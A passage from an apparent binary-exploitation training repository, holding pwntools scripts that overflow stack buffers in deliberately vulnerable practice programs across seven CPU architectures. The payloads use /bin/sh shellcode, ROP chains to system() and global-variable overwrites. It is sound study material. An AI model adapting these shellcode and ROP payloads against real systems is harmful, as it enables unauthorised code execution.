asm(shellcraft.sh()) 50 | 51 | p = process(binary_path) 52 | #p = gdb.debug([binary_path]) 53 | 54 | payload = '' 55 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 56 | payload += p64(jmp_rsp_addr) 57 | payload += shellcode 58 | 59 | p.readuntil('> ') 60 | p.write(payload) 61 | p.interactive() 62 | -------------------------------------------------------------------------------- /pwn/arm/08-overwrite-global.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00010490 <+0>: push {r7, lr} 7 | ... 8 | 0x000104c8 <+56>: pop {r7, pc} 9 | End of assembler dump. 10 | (gdb) b *0x000104c8 11 | Breakpoint 1 at 0x104c8: file src/08-overwrite-global.c, line 14. 
12 | (gdb) c 13 | Continuing. 14 | 15 | Breakpoint 1, 0x000104c8 in vulnerable () at src/08-overwrite-global.c:14 16 | 14 } 17 | (gdb) p &buffer[0] 18 | $1 = 0xfffeeea0 'a' , "-\037k\377" 19 | (gdb) i r $sp 20 | sp 0xfffeef20 0xfffeef20 21 | """ 22 | 23 | """ 24 | $ qemu-arm -L /usr/arm-linux-gnueabihf/ -strace ./bin/arm/08-overwrite-global 25 | ... 26 | 8122 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 27 | ... 28 | 8122 mmap2(NULL,1013128,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0xff6a9000 29 | ... 30 | """ 31 | 32 | """ 33 | $ ropper --nocolor --file /usr/arm-linux-gnueabihf/lib/libc-2.27.so 34 | 0x00008f2c (0x00008f2d): pop {r0, r3, r4, pc}; 35 | 0x0009449a (0x0009449b): str r0, [r3]; pop {r3, pc}; 36 | """ 37 | 38 | import struct 39 | import sys 40 | 41 | from pwn import * 42 | 43 | context(arch='arm', os='linux', endian='little', word_size=32) 44 | 45 | binary_path = './bin/arm/08-overwrite-global' 46 | 47 | saved_pc_addr = 0xfffeef20 + 4 48 | buffer_addr = 0xfffeeea0 49 | libc_addr = 0xff6a9000 50 | 51 | pop_r0_r3_r4_pc_addr = libc_addr + 0x00008f2d 52 | str_r0_r3_pop_r3_pc_addr = libc_addr + 0x0009449b 53 | 54 | binary = ELF(binary_path) 55 | not_called_addr = binary.symbols['not_called'] 56 | x_addr = binary.symbols['x'] 57 | 58 | p = process(binary_path) 59 | #p = gdb.debug([binary_path]) 60 | 61 | payload = '' 62 | payload += 'a' * (saved_pc_addr - buffer_addr) 63 | payload += p32(pop_r0_r3_r4_pc_addr) 64 | payload += p32(0xbeefc0de) # r0 65 | payload += p32(x_addr) # r3 66 | payload += p32(0) # r4 67 | payload += p32(str_r0_r3_pop_r3_pc_addr) # pc 68 | payload += p32(0) # r3 69 | payload += p32(not_called_addr) # pc 70 | 71 | p.readuntil('> ') 72 | p.write(payload) 73 | p.interactive() 74 | -------------------------------------------------------------------------------- /pwn/arm64/04-shellcode-static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) 
disassemble main 5 | Dump of assembler code for function main: 6 | 0x00000000004006c0 <+0>: stp x29, x30, [sp, #-32]! 7 | 0x00000000004006c4 <+4>: mov x29, sp 8 | 0x00000000004006c8 <+8>: str w0, [x29, #28] 9 | 0x00000000004006cc <+12>: str x1, [x29, #16] 10 | 0x00000000004006d0 <+16>: bl 0x400674 11 | 0x00000000004006d4 <+20>: mov w0, #0x0 // #0 12 | 0x00000000004006d8 <+24>: ldp x29, x30, [sp], #32 13 | 0x00000000004006dc <+28>: ret 14 | End of assembler dump. 15 | (gdb) b vulnerable 16 | Breakpoint 1 at 0x40067c: file src/04-shellcode-static.c, line 6. 17 | (gdb) b *0x00000000004006d8 18 | Breakpoint 2 at 0x4006d8: file src/04-shellcode-static.c, line 20. 19 | (gdb) c 20 | Continuing. 21 | 22 | Breakpoint 1, vulnerable () at src/04-shellcode-static.c:6 23 | 6 printf("> "); 24 | (gdb) p &buffer[0] 25 | $1 = 0x40007ffd80 "" 26 | (gdb) c 27 | Continuing. 28 | 29 | Breakpoint 2, main (argc=1, argv=0x40007fff58) at src/04-shellcode-static.c:20 30 | 20 } 31 | (gdb) i r $sp 32 | sp 0x40007ffe00 0x40007ffe00 33 | """ 34 | 35 | """ 36 | $ qemu-aarch64 -L /usr/aarch64-linux-gnu/ -strace ./bin/arm64/04-shellcode-static 37 | ... 38 | 17997 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 39 | ... 40 | 17997 mmap(NULL,1413976,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000852000 41 | ... 
42 | """ 43 | 44 | import struct 45 | import sys 46 | 47 | from pwn import * 48 | 49 | context(arch='aarch64', os='linux', endian='little', word_size=64) 50 | 51 | binary_path = './bin/arm64/04-shellcode-static' 52 | libc_path = '/usr/aarch64-linux-gnu/lib/libc-2.27.so' 53 | 54 | saved_x30_addr = 0x40007ffe00 + 8 55 | buffer_addr = 0x40007ffd80 56 | libc_addr = 0x0000004000852000 57 | 58 | shellcode = asm(shellcraft.sh()) 59 | 60 | p = process(binary_path) 61 | #p = gdb.debug([binary_path]) 62 | 63 | payload = '' 64 | payload += 'a' * (saved_x30_addr - buffer_addr) 65 | payload += p64(saved_x30_addr + 8) 66 | payload += shellcode 67 | 68 | p.readuntil('> ') 69 | p.write(payload) 70 | p.interactive() 71 | -------------------------------------------------------------------------------- /pwn/mips64/02-overwrite-ret.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000120000c70 <+0>: daddiu sp,sp,-160 7 | 0x0000000120000c74 <+4>: sd ra,152(sp) 8 | ... 9 | 0x0000000120000ce8 <+120>: ld ra,152(sp) 10 | 0x0000000120000cec <+124>: ld s8,144(sp) 11 | 0x0000000120000cf0 <+128>: ld gp,136(sp) 12 | 0x0000000120000cf4 <+132>: daddiu sp,sp,160 13 | 0x0000000120000cf8 <+136>: jr ra 14 | 0x0000000120000cfc <+140>: nop 15 | End of assembler dump. 16 | (gdb) b vulnerable 17 | Breakpoint 1 at 0x120000c90: file src/02-overwrite-ret.c, line 11. 18 | (gdb) b *0x0000000120000ce8 19 | Breakpoint 2 at 0x120000ce8: file src/02-overwrite-ret.c, line 16. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/02-overwrite-ret.c:11 24 | 11 printf("> "); 25 | (gdb) p &buffer[0] 26 | $1 = 0x40007ffd60 "" 27 | (gdb) p/x $sp+152 28 | $2 = 0x40007ffdf8 29 | """ 30 | 31 | """ 32 | $ qemu-mips64 -L /usr/mips64-linux-gnuabi64/ -strace ./bin/mips64/02-overwrite-ret 33 | ... 
34 | 6035 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 35 | ... 36 | 6035 mmap(NULL,1880864,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x000000400085e000 37 | """ 38 | 39 | """ 40 | ropper --nocolor --file /usr/mips64-linux-gnuabi64/lib/libc-2.27.so 41 | 0x000000000017a500: ld $t9, 8($sp); jalr $t9; nop; 42 | ... 43 | """ 44 | 45 | import struct 46 | import sys 47 | 48 | from pwn import * 49 | 50 | context(arch='mips64', os='linux', endian='big', word_size=64) 51 | 52 | binary_path = './bin/mips64/02-overwrite-ret' 53 | 54 | ra_saved_addr = 0x40007ffdf8 55 | buffer_addr = 0x40007ffd60 56 | libc_addr = 0x000000400085e000 57 | 58 | ld_t9_jump_t9_addr = libc_addr + 0x000000000017a500 59 | 60 | binary = ELF(binary_path) 61 | not_called_addr = binary.symbols['not_called'] 62 | 63 | p = process(binary_path) 64 | #p = gdb.debug([binary_path]) 65 | 66 | payload = '' 67 | payload += 'a' * (ra_saved_addr - buffer_addr) 68 | payload += p64(ld_t9_jump_t9_addr) 69 | payload += 'b' * 8 70 | payload += p64(not_called_addr) 71 | 72 | p.readuntil('> ') 73 | p.write(payload) 74 | p.interactive() 75 | -------------------------------------------------------------------------------- /pwn/ppc64/04-shellcode-static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00000000100007b4 <+0>: mflr r0 7 | 0x00000000100007b8 <+4>: std r0,16(r1) 8 | ... 9 | 0x0000000010000820 <+108>: ld r0,16(r1) 10 | 0x0000000010000824 <+112>: mtlr r0 11 | 0x0000000010000828 <+116>: ld r31,-8(r1) 12 | 0x000000001000082c <+120>: blr 13 | 0x0000000010000830 <+124>: .long 0x0 14 | 0x0000000010000834 <+128>: .long 0x1 15 | 0x0000000010000838 <+132>: lwz r0,1(r1) 16 | End of assembler dump. 17 | (gdb) b vulnerable 18 | Breakpoint 1 at 0x100007c8: file src/04-shellcode-static.c, line 6. 
19 | (gdb) b *0x0000000010000820 20 | Breakpoint 2 at 0x10000820: file src/04-shellcode-static.c, line 14. 21 | (gdb) c 22 | Continuing. 23 | 24 | Breakpoint 1, vulnerable () at src/04-shellcode-static.c:6 25 | 6 printf("> "); 26 | (gdb) p &buffer[0] 27 | $1 = 0x40007ff930 "" 28 | (gdb) c 29 | Continuing. 30 | 31 | Breakpoint 2, 0x0000000010000820 in vulnerable () at src/04-shellcode-static.c:14 32 | 14 } 33 | (gdb) p/x $r1+16 34 | $2 = 0x40007ff9d0 35 | """ 36 | 37 | import struct 38 | import sys 39 | 40 | from pwn import * 41 | 42 | context(arch='powerpc64', os='linux', endian='big', word_size=64) 43 | 44 | binary_path = './bin/ppc64/04-shellcode-static' 45 | 46 | saved_pc_addr = 0x40007ff9d0 47 | buffer_addr = 0x40007ff930 48 | 49 | # Adapted from http://shell-storm.org/shellcode/files/shellcode-86.php 50 | shellcode = \ 51 | '\x7c\x3f\x0b\x78' + \ 52 | '\x7c\xa5\x2a\x79' + \ 53 | '\x42\x40\xff\xf9' + \ 54 | '\x7f\x08\x02\xa6' + \ 55 | '\x3b\x18\x01\x34' + \ 56 | '\x98\xb8\xfe\xfb' + \ 57 | '\x38\x78\xfe\xf4' + \ 58 | '\xf8\x61\xff\xf0' + \ 59 | '\x38\x81\xff\xf0' + \ 60 | '\xf8\xa1\xff\xf8' + \ 61 | '\x3b\xc0\x01\x60' + \ 62 | '\x7f\xc0\x2e\x70' + \ 63 | '\x44\x00\x00\x02' + \ 64 | '/bin/shZ' 65 | 66 | p = process(binary_path) 67 | #p = gdb.debug([binary_path]) 68 | 69 | payload = '' 70 | payload += 'a' * (saved_pc_addr - buffer_addr) 71 | payload += p64(saved_pc_addr + 8) 72 | payload += shellcode 73 | 74 | p.readuntil('> ') 75 | p.write(payload) 76 | p.interactive() 77 | -------------------------------------------------------------------------------- /pwn/sparc64/02-overwrite-ret.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000000100820 <+0>: save %sp, -304, %sp 7 | ... 
8 | 0x000000000010084c <+44>: add %fp, 0x77f, %g1 9 | 0x0000000000100850 <+48>: mov 0x100, %o2 10 | 0x0000000000100854 <+52>: mov %g1, %o1 11 | 0x0000000000100858 <+56>: clr %o0 12 | 0x000000000010085c <+60>: call 0x202180 13 | ... 14 | 0x000000000010086c <+76>: return %i7 + 8 15 | 0x0000000000100870 <+80>: nop 16 | End of assembler dump. 17 | (gdb) b *0x000000000010085c 18 | Breakpoint 1 at 0x10085c: file src/02-overwrite-ret.c, line 15. 19 | (gdb) c 20 | Continuing. 21 | 22 | Breakpoint 1, 0x000000000010085c in vulnerable () at src/02-overwrite-ret.c:15 23 | 15 read(STDIN_FILENO, &buffer[0], 256); 24 | (gdb) p &buffer[0] 25 | $1 = 0x4000800a30 "" 26 | (gdb) p/x $fp+0x7ff 27 | $2 = 0x4000800ab0 28 | """ 29 | 30 | """ 31 | $ qemu-sparc64 -L /usr/sparc64-linux-gnu/ -strace ./bin/sparc64/02-overwrite-ret 32 | ... 33 | 29248 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 34 | ... 35 | 29248 mmap(NULL,2531064,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x000000400094e000 36 | ... 
37 | """ 38 | 39 | import struct 40 | import sys 41 | 42 | from pwn import * 43 | 44 | context(arch='sparc64', os='linux', endian='big', word_size=64) 45 | 46 | binary_path = './bin/sparc64/02-overwrite-ret' 47 | libc_path = '/usr/sparc64-linux-gnu/lib/libc-2.27.so' 48 | 49 | buffer_addr = 0x4000800a30 50 | main_frame_addr = 0x4000800ab0 51 | libc_addr = 0x000000400094e000 52 | 53 | binary = ELF(binary_path) 54 | not_called_addr = binary.symbols['not_called'] 55 | 56 | libc = ELF(libc_path) 57 | libc_data_header = libc.get_section_by_name('.data').header 58 | libc_rw_addr = libc_addr + libc_data_header.sh_addr + ((libc_data_header.sh_size / 2) & ~0x8) 59 | 60 | p = process(binary_path) 61 | #p = gdb.debug([binary_path]) 62 | 63 | payload = '' 64 | payload += 'a' * (main_frame_addr - buffer_addr) 65 | payload += 'b' * (14 * 8) 66 | payload += p64(libc_rw_addr) # fp -> sp 67 | payload += p64(not_called_addr - 8) # i7 -> pc 68 | 69 | p.readuntil('> ') 70 | p.write(payload) 71 | p.interactive() 72 | -------------------------------------------------------------------------------- /pwn/x86-64/04-shellcode-static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) bt 5 | #0 0x00007ffff7af4081 in __GI___libc_read (fd=0, buf=0x7fffffffdd80, nbytes=512) at ../sysdeps/unix/sysv/linux/read.c:27 6 | #1 0x0000000000400643 in vulnerable () at src/04-shellcode-static.c:10 7 | #2 0x0000000000400669 in main (argc=1, argv=0x7fffffffdf08) at src/04-shellcode-static.c:17 8 | (gdb) disassemble vulnerable 9 | Dump of assembler code for function vulnerable: 10 | 0x0000000000400607 <+0>: push rbp 11 | ... 12 | 0x000000000040064f <+72>: ret 13 | End of assembler dump. 14 | (gdb) b *0x000000000040064f 15 | Breakpoint 1 at 0x40064f: file src/04-shellcode-static.c, line 14. 16 | (gdb) c 17 | Continuing. 
18 | 19 | Breakpoint 1, 0x000000000040064f in vulnerable () at src/04-shellcode-static.c:14 20 | 14 } 21 | (gdb) p &buffer[0] 22 | $1 = 0x7fffffffdd80 'a' , " \336\377\377\377\177" 23 | (gdb) i r $rsp 24 | rsp 0x7fffffffde08 0x7fffffffde08 25 | (gdb) info proc mappings 26 | process 28617 27 | Mapped address spaces: 28 | 29 | Start Addr End Addr Size Offset objfile 30 | ... 31 | 0x7ffff79e4000 0x7ffff7bcb000 0x1e7000 0x0 /lib/x86_64-linux-gnu/libc-2.27.so 32 | 0x7ffff7bcb000 0x7ffff7dcb000 0x200000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 33 | 0x7ffff7dcb000 0x7ffff7dcf000 0x4000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 34 | 0x7ffff7dcf000 0x7ffff7dd1000 0x2000 0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so 35 | ... 36 | """ 37 | 38 | import struct 39 | import sys 40 | 41 | from pwn import * 42 | 43 | context(arch='amd64', os='linux', endian='little', word_size=64) 44 | 45 | binary_path = './bin/x86-64/04-shellcode-static' 46 | libc_path = '/lib/x86_64-linux-gnu/libc-2.27.so' 47 | 48 | vulnerable_ret_addr = 0x7fffffffde08 49 | buffer_addr = 0x7fffffffdd80 50 | libc_addr = 0x7ffff79e4000 51 | 52 | shellcode = asm(shellcraft.sh()) 53 | 54 | p = process(binary_path) 55 | #g = gdb.attach(p, 'file ./bin/x86-64/04-shellcode-static') 56 | 57 | payload = '' 58 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 59 | payload += p64(vulnerable_ret_addr + 8) 60 | payload += shellcode 61 | 62 | p.readuntil('> ') 63 | p.write(payload) 64 | p.interactive() 65 | -------------------------------------------------------------------------------- /pwn/x86/08-overwrite-global.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x80484e6: file src/08-overwrite-global.c, line 8. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/i386-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/i386-linux-gnu/libc-2.27.so from remote target... 
10 | Reading /lib/i386-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/08-overwrite-global.c:8 13 | 8 int vulnerable() { 14 | (gdb) i r $esp 15 | esp 0xffffcf6c 0xffffcf6c 16 | (gdb) p &buffer[0] 17 | $1 = 0xffffcee0 "" 18 | (gdb) info proc mappings 19 | process 7075 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0xf7dd1000 0xf7fa6000 0x1d5000 0x0 /lib/i386-linux-gnu/libc-2.27.so 25 | 0xf7fa6000 0xf7fa7000 0x1000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 26 | 0xf7fa7000 0xf7fa9000 0x2000 0x1d5000 /lib/i386-linux-gnu/libc-2.27.so 27 | 0xf7fa9000 0xf7faa000 0x1000 0x1d7000 /lib/i386-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | """ 32 | $ ropper --nocolor --file /lib/i386-linux-gnu/libc-2.27.so 33 | 0x00024b5e: pop eax; ret; 34 | 0x001926d5: pop ecx; ret; 35 | 0x0002c05e: mov dword ptr [eax], ecx; ret; 36 | """ 37 | 38 | import struct 39 | import sys 40 | 41 | from pwn import * 42 | 43 | context(arch='x86', os='linux', endian='little', word_size=32) 44 | 45 | binary_path = './bin/x86/08-overwrite-global' 46 | 47 | vulnerable_ret_addr = 0xffffcf6c 48 | buffer_addr = 0xffffcee0 49 | libc_addr = 0xf7dd1000 50 | 51 | pop_eax_ret_addr = libc_addr + 0x00024b5e 52 | pop_ecx_ret_addr = libc_addr + 0x001926d5 53 | mov_dword_ptr_eax_ecx_ret_addr = libc_addr + 0x0002c05e 54 | 55 | binary = ELF(binary_path) 56 | not_called_addr = binary.symbols['not_called'] 57 | x_addr = binary.symbols['x'] 58 | 59 | p = process(binary_path) 60 | #p = gdb.debug([binary_path]) 61 | 62 | payload = '' 63 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 64 | payload += p32(pop_eax_ret_addr) 65 | payload += p32(x_addr) 66 | payload += p32(pop_ecx_ret_addr) 67 | payload += p32(0xbeefc0de) 68 | payload += p32(mov_dword_ptr_eax_ecx_ret_addr) 69 | payload += p32(not_called_addr) 70 | 71 | p.readuntil('> ') 72 | p.write(payload) 73 | p.interactive() 74 | 
-------------------------------------------------------------------------------- /pwn/x86-64/06-system-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x4005b7: file src/06-system-rop.c, line 5. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/x86_64-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/x86_64-linux-gnu/.debug/libc-2.27.so from remote target... 11 | 12 | Breakpoint 1, vulnerable () at src/06-system-rop.c:5 13 | 5 int vulnerable() { 14 | (gdb) i r $rsp 15 | rsp 0x7fffffffddf8 0x7fffffffddf8 16 | (gdb) p &buffer[0] 17 | $1 = 0x7fffffffdd70 "\377\377\377\377" 18 | (gdb) info proc mappings 19 | process 14019 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0x7ffff79e4000 0x7ffff7bcb000 0x1e7000 0x0 /lib/x86_64-linux-gnu/libc-2.27.so 25 | 0x7ffff7bcb000 0x7ffff7dcb000 0x200000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 26 | 0x7ffff7dcb000 0x7ffff7dcf000 0x4000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 27 | 0x7ffff7dcf000 0x7ffff7dd1000 0x2000 0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so 28 | ... 
29 | """ 30 | 31 | """ 32 | $ ropper --nocolor --file /lib/x86_64-linux-gnu/libc-2.27.so 33 | 0x000000000002155f: pop rdi; ret; 34 | """ 35 | 36 | import struct 37 | import sys 38 | 39 | from pwn import * 40 | 41 | context(arch='amd64', os='linux', endian='little', word_size=64) 42 | 43 | binary_path = './bin/x86-64/06-system-rop' 44 | libc_path = '/lib/x86_64-linux-gnu/libc-2.27.so' 45 | 46 | vulnerable_ret_addr = 0x7fffffffddf8 47 | buffer_addr = 0x7fffffffdd70 48 | libc_addr = 0x7ffff79e4000 49 | 50 | pop_rdi_ret_addr = libc_addr + 0x000000000002155f 51 | 52 | libc = ELF(libc_path) 53 | system_addr = libc_addr + libc.symbols['system'] 54 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 55 | 56 | retq_asm = asm('retq') 57 | retq_addr = libc_addr + libc.search(retq_asm).next() 58 | 59 | p = process(binary_path) 60 | #p = gdb.debug([binary_path]) 61 | 62 | payload = '' 63 | payload += 'a' * (vulnerable_ret_addr - buffer_addr) 64 | payload += p64(retq_addr) # align stack 65 | payload += p64(pop_rdi_ret_addr) 66 | payload += p64(bin_sh_addr) 67 | payload += p64(system_addr) 68 | 69 | p.readuntil('> ') 70 | p.write(payload) 71 | p.interactive() 72 | -------------------------------------------------------------------------------- /pwn/mips64/04-shellcode-static.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | ''' 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000120000c10 <+0>: daddiu sp,sp,-160 7 | 0x0000000120000c14 <+4>: sd ra,152(sp) 8 | ... 9 | 0x0000000120000c9c <+140>: ld ra,152(sp) 10 | 0x0000000120000ca0 <+144>: ld s8,144(sp) 11 | 0x0000000120000ca4 <+148>: ld gp,136(sp) 12 | 0x0000000120000ca8 <+152>: daddiu sp,sp,160 13 | 0x0000000120000cac <+156>: jr ra 14 | 0x0000000120000cb0 <+160>: nop 15 | End of assembler dump. 16 | (gdb) b vulnerable 17 | Breakpoint 1 at 0x120000c30: file src/04-shellcode-static.c, line 6. 
18 | (gdb) b *0x0000000120000c9c 19 | Breakpoint 2 at 0x120000c9c: file src/04-shellcode-static.c, line 14. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/04-shellcode-static.c:6 24 | 6 printf('> '); 25 | (gdb) p &buffer[0] 26 | $1 = 0x40007ffd60 '' 27 | (gdb) c 28 | Continuing. 29 | 30 | Breakpoint 2, 0x0000000120000c9c in vulnerable () at src/04-shellcode-static.c:14 31 | 14 } 32 | (gdb) p/x $sp+152 33 | $2 = 0x40007ffdf8 34 | ''' 35 | 36 | ''' 37 | $ qemu-mips64 -L /usr/mips64-linux-gnuabi64/ -strace ./bin/mips64/04-shellcode-static 38 | ... 39 | 18720 openat(AT_FDCWD,'/lib/libc.so.6',O_RDONLY|O_CLOEXEC) = 3 40 | ... 41 | 18720 mmap(NULL,1880864,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x000000400085e000 42 | ... 43 | ''' 44 | 45 | import struct 46 | import sys 47 | 48 | from pwn import * 49 | 50 | context(arch='mips64', os='linux', endian='big', word_size=64) 51 | 52 | binary_path = './bin/mips64/04-shellcode-static' 53 | 54 | ra_saved_addr = 0x40007ffdf8 55 | buffer_addr = 0x40007ffd60 56 | libc_addr = 0x000000400085e000 57 | 58 | # Adapted from https://www.exploit-db.com/exploits/45287 59 | shellcode = \ 60 | '\x62\x2f\x0c\x3c'[::-1] + \ 61 | '\x6e\x69\x8c\x35'[::-1] + \ 62 | '\xf4\xff\xac\xaf'[::-1] + \ 63 | '\x73\x2f\x0d\x3c'[::-1] + \ 64 | '\x00\x68\xad\x35'[::-1] + \ 65 | '\xf8\xff\xad\xaf'[::-1] + \ 66 | '\xf4\xff\xa4\x67'[::-1] + \ 67 | '\xff\xff\x05\x28'[::-1] + \ 68 | '\xff\xff\x06\x28'[::-1] + \ 69 | '\xc1\x13\x02\x24'[::-1] + \ 70 | '\x0c\x01\x01\x01'[::-1] 71 | 72 | p = process(binary_path) 73 | #p = gdb.debug([binary_path]) 74 | 75 | payload = '' 76 | payload += 'a' * (ra_saved_addr - buffer_addr) 77 | payload += p64(ra_saved_addr + 8) 78 | payload += shellcode 79 | 80 | p.readuntil('> ') 81 | p.write(payload) 82 | p.interactive() 83 | -------------------------------------------------------------------------------- /pwn/arm64/06-system-rop.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble main 5 | Dump of assembler code for function main: 6 | 0x0000000000400678 <+0>: stp x29, x30, [sp, #-32]! 7 | ... 8 | 0x0000000000400690 <+24>: ldp x29, x30, [sp], #32 9 | 0x0000000000400694 <+28>: ret 10 | End of assembler dump. 11 | (gdb) b vulnerable 12 | Breakpoint 1 at 0x40063c: file src/06-system-rop.c, line 6. 13 | (gdb) b *0x0000000000400690 14 | Breakpoint 2 at 0x400690: file src/06-system-rop.c, line 17. 15 | (gdb) c 16 | Continuing. 17 | 18 | Breakpoint 1, vulnerable () at src/06-system-rop.c:6 19 | 6 printf("> "); 20 | (gdb) p &buffer[0] 21 | $1 = 0x40007ffd80 "" 22 | (gdb) c 23 | Continuing. 24 | 25 | Breakpoint 2, main (argc=1, argv=0x40007fff58) at src/06-system-rop.c:17 26 | 17 } 27 | (gdb) i r $sp 28 | sp 0x40007ffe00 0x40007ffe00 29 | """ 30 | 31 | """ 32 | $ qemu-aarch64 -L /usr/aarch64-linux-gnu/ -strace ./bin/arm64/06-system-rop 33 | ... 34 | 24334 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 35 | ... 36 | 24334 mmap(NULL,1413976,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000852000 37 | ... 
38 | """ 39 | 40 | """ 41 | $ ropper --nocolor --file /usr/aarch64-linux-gnu/lib/libc-2.27.so 42 | 0x00036edc: ldp x24, x25, [sp, #0x38]; ldp x29, x30, [sp], #0x50; ret; 43 | 0x000ce2ec: mov x0, x24; blr x25; 44 | """ 45 | 46 | import struct 47 | import sys 48 | 49 | from pwn import * 50 | 51 | context(arch='aarch64', os='linux', endian='little', word_size=64) 52 | 53 | binary_path = './bin/arm64/06-system-rop' 54 | libc_path = '/usr/aarch64-linux-gnu/lib/libc-2.27.so' 55 | 56 | saved_x30_addr = 0x40007ffe00 + 8 57 | buffer_addr = 0x40007ffd80 58 | libc_addr = 0x0000004000852000 59 | 60 | ldp_x24_x25_x30_ret_addr = libc_addr + 0x00036edc 61 | mov_x0_x24_blr_x25_addr = libc_addr + 0x000ce2ec 62 | 63 | libc = ELF(libc_path) 64 | system_addr = libc_addr + libc.symbols['system'] 65 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 66 | 67 | p = process(binary_path) 68 | #p = gdb.debug([binary_path]) 69 | 70 | payload = '' 71 | payload += 'a' * (saved_x30_addr - buffer_addr) 72 | payload += p64(ldp_x24_x25_x30_ret_addr) 73 | payload += 'b' * 16 74 | payload += p64(0) # x29 75 | payload += p64(mov_x0_x24_blr_x25_addr) # x30 76 | payload += 'c' * (0x38 - 16) 77 | payload += p64(bin_sh_addr) # x24 78 | payload += p64(system_addr) # x25 79 | 80 | p.readuntil('> ') 81 | p.write(payload) 82 | p.interactive() 83 | -------------------------------------------------------------------------------- /pwn/x86-64/08-overwrite-global.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) b *(&vulnerable) 5 | Breakpoint 1 at 0x400607: file src/08-overwrite-global.c, line 8. 6 | (gdb) c 7 | Continuing. 8 | Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... 9 | Reading /lib/x86_64-linux-gnu/libc-2.27.so from remote target... 10 | Reading /lib/x86_64-linux-gnu/.debug/libc-2.27.so from remote target... 
11 | 12 | Breakpoint 1, vulnerable () at src/08-overwrite-global.c:8 13 | 8 int vulnerable() { 14 | (gdb) i r $rsp 15 | rsp 0x7fffffffdda8 0x7fffffffdda8 16 | (gdb) p &buffer[0] 17 | $1 = 0x7fffffffdd20 "\377\377\377\377" 18 | (gdb) info proc mappings 19 | process 7590 20 | Mapped address spaces: 21 | 22 | Start Addr End Addr Size Offset objfile 23 | ... 24 | 0x7ffff79e4000 0x7ffff7bcb000 0x1e7000 0x0 /lib/x86_64-linux-gnu/libc-2.27.so 25 | 0x7ffff7bcb000 0x7ffff7dcb000 0x200000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 26 | 0x7ffff7dcb000 0x7ffff7dcf000 0x4000 0x1e7000 /lib/x86_64-linux-gnu/libc-2.27.so 27 | 0x7ffff7dcf000 0x7ffff7dd1000 0x2000 0x1eb000 /lib/x86_64-linux-gnu/libc-2.27.so 28 | ... 29 | """ 30 | 31 | """ 32 | $ ropper --nocolor --file /lib/x86_64-linux-gnu/libc-2.27.so 33 | 0x00000000000439c8: pop rax; ret; 34 | 0x000000000002155f: pop rdi; ret; 35 | 0x0000000000097055: mov qword ptr [rax], rdi; ret; 36 | """ 37 | 38 | import struct 39 | import sys 40 | 41 | from pwn import * 